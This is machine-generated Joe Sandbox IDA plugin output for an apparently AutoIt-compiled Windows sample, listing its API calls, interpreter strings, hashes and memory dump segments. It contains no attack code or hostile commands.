                                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                        • Instruction Fuzzy Hash: 87C185723061D309DF2D863B883603EBAA15E967B139A076DD4B2CF5D4EE38C975D620
                                                        APIs
                                                        • DeleteObject.GDI32(00000000), ref: 0083785B
                                                        • DeleteObject.GDI32(00000000), ref: 0083786D
                                                        • DestroyWindow.USER32 ref: 0083787B
                                                        • GetDesktopWindow.USER32 ref: 00837895
                                                        • GetWindowRect.USER32(00000000), ref: 0083789C
                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 008379DD
                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 008379ED
                                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00837A35
                                                        • GetClientRect.USER32(00000000,?), ref: 00837A41
                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00837A7B
                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00837A9D
                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00837AB0
                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00837ABB
                                                        • GlobalLock.KERNEL32(00000000), ref: 00837AC4
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00837AD3
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00837ADC
                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00837AE3
                                                        • GlobalFree.KERNEL32(00000000), ref: 00837AEE
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00837B00
                                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00852CAC,00000000), ref: 00837B16
                                                        • GlobalFree.KERNEL32(00000000), ref: 00837B26
                                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00837B4C
                                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00837B6B
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00837B8D
                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00837D7A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                        • API String ID: 2211948467-2373415609
                                                        • Opcode ID: fc12006168028c80a9196312a13211dbffef1e0b66453f4f2d5a59d2b66a3f4c
                                                        • Instruction ID: 3ea6536c0a6602d198268be6d6ff2f6cdb003f0ab813ec155ea9053587161aa9
                                                        • Opcode Fuzzy Hash: fc12006168028c80a9196312a13211dbffef1e0b66453f4f2d5a59d2b66a3f4c
                                                        • Instruction Fuzzy Hash: 7E023B75900119EFDB14DFA8DD89EAE7BB9FB49310F144158FA15EB2A1CB34AD01CB60
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?,0084F910), ref: 00843627
                                                        • IsWindowVisible.USER32(?), ref: 0084364B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpperVisibleWindow
                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                        • API String ID: 4105515805-45149045
                                                        • Opcode ID: ea610b65d2836ad846583e97e82e84cfc420db8de09097d8ee26fc96b9e09ccd
                                                        • Instruction ID: 3af302000366ba78f61d6ac634ca5c4d182135169be42558c9772d561ff7f8d0
                                                        • Opcode Fuzzy Hash: ea610b65d2836ad846583e97e82e84cfc420db8de09097d8ee26fc96b9e09ccd
                                                        • Instruction Fuzzy Hash: B0D16130204309DBCB04EF14C45AA6E7BA5FF55354F15846CF985DB2A2DB35EE8ACB81
                                                        APIs
                                                        • SetTextColor.GDI32(?,00000000), ref: 0084A630
                                                        • GetSysColorBrush.USER32(0000000F), ref: 0084A661
                                                        • GetSysColor.USER32(0000000F), ref: 0084A66D
                                                        • SetBkColor.GDI32(?,000000FF), ref: 0084A687
                                                        • SelectObject.GDI32(?,00000000), ref: 0084A696
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0084A6C1
                                                        • GetSysColor.USER32(00000010), ref: 0084A6C9
                                                        • CreateSolidBrush.GDI32(00000000), ref: 0084A6D0
                                                        • FrameRect.USER32(?,?,00000000), ref: 0084A6DF
                                                        • DeleteObject.GDI32(00000000), ref: 0084A6E6
                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0084A731
                                                        • FillRect.USER32(?,?,00000000), ref: 0084A763
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0084A78E
                                                          • Part of subcall function 0084A8CA: GetSysColor.USER32(00000012), ref: 0084A903
                                                          • Part of subcall function 0084A8CA: SetTextColor.GDI32(?,?), ref: 0084A907
                                                          • Part of subcall function 0084A8CA: GetSysColorBrush.USER32(0000000F), ref: 0084A91D
                                                          • Part of subcall function 0084A8CA: GetSysColor.USER32(0000000F), ref: 0084A928
                                                          • Part of subcall function 0084A8CA: GetSysColor.USER32(00000011), ref: 0084A945
                                                          • Part of subcall function 0084A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0084A953
                                                          • Part of subcall function 0084A8CA: SelectObject.GDI32(?,00000000), ref: 0084A964
                                                          • Part of subcall function 0084A8CA: SetBkColor.GDI32(?,00000000), ref: 0084A96D
                                                          • Part of subcall function 0084A8CA: SelectObject.GDI32(?,?), ref: 0084A97A
                                                          • Part of subcall function 0084A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0084A999
                                                          • Part of subcall function 0084A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0084A9B0
                                                          • Part of subcall function 0084A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0084A9C5
                                                          • Part of subcall function 0084A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0084A9ED
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                        • String ID:
                                                        • API String ID: 3521893082-0
                                                        • Opcode ID: 5981885488edb5d20af7c175098479df2db59057b861c2512a700763df9707c1
                                                        • Instruction ID: a9365b404243b25629ea02028c81318c96c2c1badae147a932c6e070732de009
                                                        • Opcode Fuzzy Hash: 5981885488edb5d20af7c175098479df2db59057b861c2512a700763df9707c1
                                                        • Instruction Fuzzy Hash: AF918C76008305EFD7119F64DC08A5BBBA9FF89321F110A2DFAA2DA1A2D771D944CB52
                                                        APIs
                                                        • DestroyWindow.USER32(?,?,?), ref: 007C2CA2
                                                        • DeleteObject.GDI32(00000000), ref: 007C2CE8
                                                        • DeleteObject.GDI32(00000000), ref: 007C2CF3
                                                        • DestroyIcon.USER32(00000000,?,?,?), ref: 007C2CFE
                                                        • DestroyWindow.USER32(00000000,?,?,?), ref: 007C2D09
                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 007FC43B
                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 007FC474
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 007FC89D
                                                          • Part of subcall function 007C1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,007C2036,?,00000000,?,?,?,?,007C16CB,00000000,?), ref: 007C1B9A
                                                        • SendMessageW.USER32(?,00001053), ref: 007FC8DA
                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 007FC8F1
                                                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 007FC907
                                                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 007FC912
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                        • String ID: 0
                                                        • API String ID: 464785882-4108050209
                                                        • Opcode ID: 6ca5862a7ce12ea79293b4a792a92b5ebc4357bb1f3676ef7c433fdaa41bfa74
                                                        • Instruction ID: 4e420ceb736a7089e9dcfe892827877bc027689eaa33fb01022190798257ecec
                                                        • Opcode Fuzzy Hash: 6ca5862a7ce12ea79293b4a792a92b5ebc4357bb1f3676ef7c433fdaa41bfa74
                                                        • Instruction Fuzzy Hash: E812AE34604209EFDB26CF24C988BB9B7E1BF45310F54456DE655CB262CB39EC52CBA1
                                                        APIs
                                                        • DestroyWindow.USER32(00000000), ref: 008374DE
                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0083759D
                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 008375DB
                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 008375ED
                                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00837633
                                                        • GetClientRect.USER32(00000000,?), ref: 0083763F
                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00837683
                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00837692
                                                        • GetStockObject.GDI32(00000011), ref: 008376A2
                                                        • SelectObject.GDI32(00000000,00000000), ref: 008376A6
                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 008376B6
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008376BF
                                                        • DeleteDC.GDI32(00000000), ref: 008376C8
                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008376F4
                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 0083770B
                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00837746
                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0083775A
                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 0083776B
                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0083779B
                                                        • GetStockObject.GDI32(00000011), ref: 008377A6
                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 008377B1
                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 008377BB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                        • API String ID: 2910397461-517079104
                                                        • Opcode ID: 94a3aa8fb4db8073ceb9559d02f2c05b285f64cd625cd9905f94693f3c40286d
                                                        • Instruction ID: e4c606543a942672efcb30bf606e926971e9f8fd99273923589d5c1814c79257
                                                        • Opcode Fuzzy Hash: 94a3aa8fb4db8073ceb9559d02f2c05b285f64cd625cd9905f94693f3c40286d
                                                        • Instruction Fuzzy Hash: F4A162B5A40615BFEB14DBA8DC49FAE7BA9FB49710F004118FA15E72E1DB74AD00CB60
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0082AD1E
                                                        • GetDriveTypeW.KERNEL32(?,0084FAC0,?,\\.\,0084F910), ref: 0082ADFB
                                                        • SetErrorMode.KERNEL32(00000000,0084FAC0,?,\\.\,0084F910), ref: 0082AF59
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DriveType
                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                        • API String ID: 2907320926-4222207086
                                                        • Opcode ID: 5fa60ab008efad7b1a461b00cef73ba15d3a1b57bb27606fc430378bcd213dbc
                                                        • Instruction ID: 70e2a6951c29cc5e1d29b9643053f8975c0e8a44bc5d3c826110cb87373e459d
                                                        • Opcode Fuzzy Hash: 5fa60ab008efad7b1a461b00cef73ba15d3a1b57bb27606fc430378bcd213dbc
                                                        • Instruction Fuzzy Hash: 2F5193B5684229EB8B18DB10FA5ADBDB361FF08714720805BE41AE7291DE39DD81DB43
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                        • API String ID: 1038674560-86951937
                                                        • Opcode ID: 690087f3b53898f563e62d5ffc952d0e5dd66bfa3e10ae5c0f66118fa1d89bbe
                                                        • Instruction ID: 2bc792543076434fbeb268b474ab0caed2351b9127429e50e0099c6e1a50a44c
                                                        • Opcode Fuzzy Hash: 690087f3b53898f563e62d5ffc952d0e5dd66bfa3e10ae5c0f66118fa1d89bbe
                                                        • Instruction Fuzzy Hash: 97810BB1640209EACB10AA61DCCBFBE3768EF19710F14402CF905AB296EB7DDE45C691
                                                        APIs
                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00848AC1
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00848AD2
                                                        • CharNextW.USER32(0000014E), ref: 00848B01
                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00848B42
                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00848B58
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00848B69
                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00848B86
                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00848BD8
                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00848BEE
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00848C1F
                                                        • _memset.LIBCMT ref: 00848C44
                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00848C8D
                                                        • _memset.LIBCMT ref: 00848CEC
                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00848D16
                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00848D6E
                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 00848E1B
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00848E3D
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00848E87
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00848EB4
                                                        • DrawMenuBar.USER32(?), ref: 00848EC3
                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00848EEB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                        • String ID: 0$0R
                                                        • API String ID: 1073566785-488941688
                                                        • Opcode ID: b4889fcebc7997f4cfa3d8978e4cb0f84b57aaf9a35d53d0c38a8fe563aa53b0
                                                        • Instruction ID: 613702860b2339dc697c2e54f335b1b7fad34c4c8d75706c8210188021b160fe
                                                        • Opcode Fuzzy Hash: b4889fcebc7997f4cfa3d8978e4cb0f84b57aaf9a35d53d0c38a8fe563aa53b0
                                                        • Instruction Fuzzy Hash: E2E18E7490121CEEDB20DF54CC84AEE7BB9FF0A710F00815AFA15EA291EB749984CF61
                                                        APIs
                                                        • GetSysColor.USER32(00000012), ref: 0084A903
                                                        • SetTextColor.GDI32(?,?), ref: 0084A907
                                                        • GetSysColorBrush.USER32(0000000F), ref: 0084A91D
                                                        • GetSysColor.USER32(0000000F), ref: 0084A928
                                                        • CreateSolidBrush.GDI32(?), ref: 0084A92D
                                                        • GetSysColor.USER32(00000011), ref: 0084A945
                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0084A953
                                                        • SelectObject.GDI32(?,00000000), ref: 0084A964
                                                        • SetBkColor.GDI32(?,00000000), ref: 0084A96D
                                                        • SelectObject.GDI32(?,?), ref: 0084A97A
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0084A999
                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0084A9B0
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0084A9C5
                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0084A9ED
                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0084AA14
                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 0084AA32
                                                        • DrawFocusRect.USER32(?,?), ref: 0084AA3D
                                                        • GetSysColor.USER32(00000011), ref: 0084AA4B
                                                        • SetTextColor.GDI32(?,00000000), ref: 0084AA53
                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0084AA67
                                                        • SelectObject.GDI32(?,0084A5FA), ref: 0084AA7E
                                                        • DeleteObject.GDI32(?), ref: 0084AA89
                                                        • SelectObject.GDI32(?,?), ref: 0084AA8F
                                                        • DeleteObject.GDI32(?), ref: 0084AA94
                                                        • SetTextColor.GDI32(?,?), ref: 0084AA9A
                                                        • SetBkColor.GDI32(?,?), ref: 0084AAA4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                        • String ID:
                                                        • API String ID: 1996641542-0
                                                        • Opcode ID: 78bdc229445ce48c611efddb1dcc9f2f6d30cf1bff50b1bb6b137066c46d44c4
                                                        • Instruction ID: 771e1fe3c2ad2adbd08b1c57e344b7f197f97f671a9e637e8a31043766b907fb
                                                        • Opcode Fuzzy Hash: 78bdc229445ce48c611efddb1dcc9f2f6d30cf1bff50b1bb6b137066c46d44c4
                                                        • Instruction Fuzzy Hash: 42512D75900208FFDB119FA4DC48EAEBF79FB49320F114529FA11AB2A2D7759940DF90
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 008449CA
                                                        • GetDesktopWindow.USER32 ref: 008449DF
                                                        • GetWindowRect.USER32(00000000), ref: 008449E6
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00844A48
                                                        • DestroyWindow.USER32(?), ref: 00844A74
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00844A9D
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00844ABB
                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00844AE1
                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 00844AF6
                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00844B09
                                                        • IsWindowVisible.USER32(?), ref: 00844B29
                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00844B44
                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00844B58
                                                        • GetWindowRect.USER32(?,?), ref: 00844B70
                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00844B96
                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 00844BB0
                                                        • CopyRect.USER32(?,?), ref: 00844BC7
                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00844C32
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                        • String ID: ($0$tooltips_class32
                                                        • API String ID: 698492251-4156429822
                                                        APIs
                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007C28BC
                                                        • GetSystemMetrics.USER32(00000007), ref: 007C28C4
                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007C28EF
                                                        • GetSystemMetrics.USER32(00000008), ref: 007C28F7
                                                        • GetSystemMetrics.USER32(00000004), ref: 007C291C
                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 007C2939
                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 007C2949
                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 007C297C
                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 007C2990
                                                        • GetClientRect.USER32(00000000,000000FF), ref: 007C29AE
                                                        • GetStockObject.GDI32(00000011), ref: 007C29CA
                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 007C29D5
                                                          • Part of subcall function 007C2344: GetCursorPos.USER32(?), ref: 007C2357
                                                          • Part of subcall function 007C2344: ScreenToClient.USER32(008857B0,?), ref: 007C2374
                                                          • Part of subcall function 007C2344: GetAsyncKeyState.USER32(00000001), ref: 007C2399
                                                          • Part of subcall function 007C2344: GetAsyncKeyState.USER32(00000002), ref: 007C23A7
